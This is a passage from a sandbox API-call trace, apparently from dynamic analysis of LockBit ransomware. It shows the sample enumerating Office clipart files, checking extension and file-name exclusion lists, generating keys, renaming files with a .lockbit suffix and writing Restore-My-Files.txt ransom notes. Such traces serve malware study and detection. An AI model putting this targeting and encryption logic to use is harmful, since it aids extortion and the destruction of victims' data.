lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.817] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.lockbit") returned 72 [0115.817] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0115.817] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.817] malloc (_Size=0x40068) returned 0x3ef0008 [0115.817] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2488) returned 1 [0115.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0115.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0115.819] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0115.826] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.826] malloc (_Size=0xa6) returned 0x77d7a8 [0115.826] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.827] free (_Block=0x77d7a8) [0115.827] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.827] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.827] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.827] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x88c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02071_.WMF", cAlternateFileName="")) returned 1 [0115.827] lstrcmpiW (lpString1=".", lpString2="FD02071_.WMF") returned -1 [0115.827] lstrcmpiW (lpString1="..", lpString2="FD02071_.WMF") returned -1 [0115.827] PathFindExtensionW (pszPath="FD02071_.WMF") returned=".WMF" [0115.827] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.827] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.827] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.827] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.827] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.827] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.828] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.828] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02071_.WMF") returned 1 [0115.829] lstrcmpiW (lpString1="ntldr", lpString2="FD02071_.WMF") returned 1 [0115.829] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02071_.WMF") returned 1 [0115.829] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02071_.WMF") returned -1 [0115.829] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02071_.WMF") returned -1 [0115.829] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02071_.WMF") returned 1 [0115.829] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02071_.WMF") returned 1 [0115.829] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.829] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned=".WMF" [0115.829] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.829] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.829] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.830] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.830] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.lockbit") returned 72 [0115.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0115.831] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.831] malloc (_Size=0x40068) returned 0x3d70450 [0115.831] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2188) returned 1 [0115.831] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.832] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0115.832] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.832] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0115.832] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0115.869] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.869] malloc (_Size=0xa6) returned 0x77d7a8 [0115.869] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0115.869] free (_Block=0x77d7a8) [0115.869] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.869] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.869] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x112c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02075_.WMF", cAlternateFileName="")) returned 1 [0115.869] lstrcmpiW (lpString1=".", lpString2="FD02075_.WMF") returned -1 [0115.869] lstrcmpiW (lpString1="..", lpString2="FD02075_.WMF") returned -1 [0115.869] PathFindExtensionW (pszPath="FD02075_.WMF") returned=".WMF" [0115.869] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.869] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.870] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.870] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02075_.WMF") returned 1 [0115.871] lstrcmpiW (lpString1="ntldr", lpString2="FD02075_.WMF") returned 1 [0115.871] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02075_.WMF") returned 1 [0115.871] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02075_.WMF") returned -1 [0115.871] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02075_.WMF") returned -1 [0115.871] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02075_.WMF") returned 1 [0115.871] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02075_.WMF") returned 1 [0115.871] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.871] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned=".WMF" [0115.871] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.871] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.871] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.872] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.872] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.lockbit") returned 72 [0115.872] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0115.873] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.873] malloc (_Size=0x40068) returned 0x1ff1e60 [0115.873] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4396) returned 1 [0115.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0115.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0115.875] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0115.951] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0116.214] malloc (_Size=0xa6) returned 0x77d7a8 [0116.214] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0116.215] free (_Block=0x77d7a8) [0116.215] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0116.216] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0116.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0116.217] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02088_.WMF", cAlternateFileName="")) returned 1 [0116.217] lstrcmpiW (lpString1=".", lpString2="FD02088_.WMF") returned -1 [0116.217] lstrcmpiW (lpString1="..", lpString2="FD02088_.WMF") returned -1 [0116.217] PathFindExtensionW (pszPath="FD02088_.WMF") returned=".WMF" [0116.217] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0116.217] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0116.218] lstrcmpiW 